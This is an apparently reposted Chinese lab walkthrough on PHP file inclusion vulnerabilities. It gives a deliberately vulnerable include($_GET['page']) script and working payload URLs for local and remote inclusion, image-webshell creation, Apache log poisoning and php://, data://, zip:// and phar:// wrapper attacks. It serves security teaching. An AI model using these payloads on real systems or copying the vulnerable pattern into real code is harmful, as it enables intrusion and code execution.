IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> 文件包含实验 -> 正文阅读

[PHP知识库]文件包含实验

原理:
文件包含漏洞产生的原因是在通过PHP函数引入文件时,由于传入的文件名没有
经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意
的代码注入。
几乎所有的脚本语言都会提供文件包含的功能,但文件包含漏洞在PHP Web
Application中居多,而在JSP、ASP、ASP.NET程序中却非常少,这是有些语言设计
的弊端。在PHP中经常出现文件包含漏洞,但并不意味着其他语言不存在。
使用的函数:
include():找不到被包含文件时会产生警告(E_WARNING) ;
include_once():与include()类似,代码已经被包含则不会再次包含,即只执行一次
require():找不到被包含的文件时会产生致命错误,后续代码不执行(E_COMPILE_ERROR)
require_once():与require()类似,代码已经被包含则不会再次包含

实验
创建include.php文件

 <?php
include($_GET['page']);
?>

创建phpinfo.php文件

<?php  phpinfo();?>

创建1123.php文件

<?php
echo "1123!!!";
?>

1.本地文件包含;(无视后缀)

http://192.168.5.63/include/include.php?page=phpinfo.php?page=phpinfo.php

请添加图片描述请添加图片描述

请添加图片描述
分别修改phpinfo.php文件后缀名为:txt、jpg、rar、png等均可解析。
1.1本地包含配合文件上传
上传图片马
生成格式:copy 1.jpg/b+phpinfo.php/a 2.jpg 其中b表示base64编码,a表示ASCII编码
请添加图片描述

2.远程文件包含getshell;
要求:目标机apache配置文件中:allow_url_include是开启的(状态为on)

http://192.168.5.63/include/include.php?page=http://192.168.160.147/include/phpinfo.php

请添加图片描述

3.apache日志文件包含getshell;
打开apache的配置文件httpd.conf,去掉CustomLog “logs/access.log” common前面的#
请添加图片描述
访问本机phpinfo.php文件后查看access.log文件,找到刚才的登录日志
请添加图片描述
发现符号被编码。利用BurpSuite抓包,将被编码的符号改回,再次发送后查看access.log文件,发现代码没有再被编码,phpinfo写入access.log文件中
请添加图片描述
请添加图片描述

请添加图片描述请添加图片描述

4.php伪协议;
(1) php://input命令执行
(allow_url_include=on,allow_url_fopen不做要求)
写入shell
(2)filter://读取源码
(allow_url_include,allow_url_fopen不做要求)

?page=php://filter/read=convert.base64-encode/resource=index.php

请添加图片描述

?page=php://filter/convert.base64-encode/resource=index.php

请添加图片描述

(3) zip://getshell
这里先将1123.php文件压缩为zip格式,并增添123.txt格式。如果解析失败则将压缩包改为jpg格式。使用zip协议需要指定的绝对路径,使用相对路径会包含失败。

?page=zip://D:/phpStudy/PHPTutorial/WWW/include/1123.jpg%231123.txt

请添加图片描述

(4)data://
代码执行
php版本大于5.2,allow_url_include,allow_url_fopen都为on状态

?page=data://text/plain,<?php phpinfo();?>

请添加图片描述

?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

请添加图片描述

(5)phar://

?page=phar://D:/phpStudy/PHPTutorial/WWW/include/1123.zip/1123.txt
?page=phar://D:/phpStudy/PHPTutorial/WWW/include/1123.jpg/1123.txt

请添加图片描述

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-03-03 15:48:22  更:2022-03-03 15:49:11 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/26 16:08:59-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计